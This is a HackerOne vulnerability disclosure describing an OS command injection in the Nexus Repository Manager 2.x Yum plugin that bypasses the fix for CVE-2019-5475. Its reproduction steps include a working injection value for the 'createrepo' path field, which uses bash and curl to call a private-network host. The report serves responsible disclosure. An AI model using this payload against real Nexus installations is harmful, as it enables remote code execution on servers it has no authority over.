Central Security Project: OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475)

2019-09-05T03:25:50
ID H1:688270
Type hackerone
Reporter badcode_
Modified 2019-10-29T11:03:48

Description

OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475)

Maven artifact

groupId: org.sonatype.nexus.plugins artifactId: nexus-yum-repository-plugin version: 2.14.14-01

Vulnerability

Vulnerability Description

The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data is vulnerable, such as the Yum Configuration Capability.

Additional Details

Take a look at the patch for CVE-2019-5475

https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63#diff-4ab0523de106ac7a38808f0231fc8a23R84

The getCleanCommand method is not completely filtered and can still be bypassed.

Steps To Reproduce:

  1. Navigate to "Capabilities" in Nexus Repository Manager.

  2. Edit or create a new Yum: Configuration capability

  3. Set path of "createrepo" or "mergerepo" to an OS command (e.g. /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo)

Supporting Material/References:

  • Ubuntu
  • Sonatype Nexus Repository Manager 2.14.14-01
  • Java 8

Wrap up

  • I contacted the maintainer to let them know: N
  • I opened an issue in the related repository: N

Impact

An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.

Impact

An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.